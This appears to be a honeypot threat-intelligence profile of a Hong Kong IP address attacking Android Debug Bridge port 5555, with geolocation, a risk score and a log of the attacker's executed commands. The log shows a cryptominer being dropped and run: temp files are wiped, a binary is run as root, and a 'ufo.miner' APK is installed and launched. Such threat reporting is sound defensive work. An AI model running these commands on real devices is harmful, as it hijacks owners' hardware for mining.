TROYANOSYVIRUS
Active ThreatLOW

42.2.89.216

Country of Origin🇭🇰 Hong Kong
First Detection5/3/2026
Last Activity5/3/2026
ISPHKT Limited
🎯
18
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
4
Malware

Geolocation

Country
🇭🇰 Hong Kong
City
Unknown
ASN
AS4760
ISP
HKT Limited

Attack Types

adb_honeypot

Attacked Ports

5555

Associated Malware

Executed Commands

$rm -rf /data/local/tmp/*2x
$ps | grep xig1x
$/data/local/tmp/nohup su -c /data/local/tmp/trinity1x
$ps | grep trinity1x
$rm /data/local/tmp/ufo.apk1x
$pm install /data/local/tmp/ufo.apk1x
$chmod 0755 /data/local/tmp/nohup1x
$chmod 0755 /data/local/tmp/trinity1x
$pm path com.ufo.miner1x
$am start -n com.ufo.miner/com.example.test.MainActivity1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Risk Assessment

30
/100
LowMediumHighCritical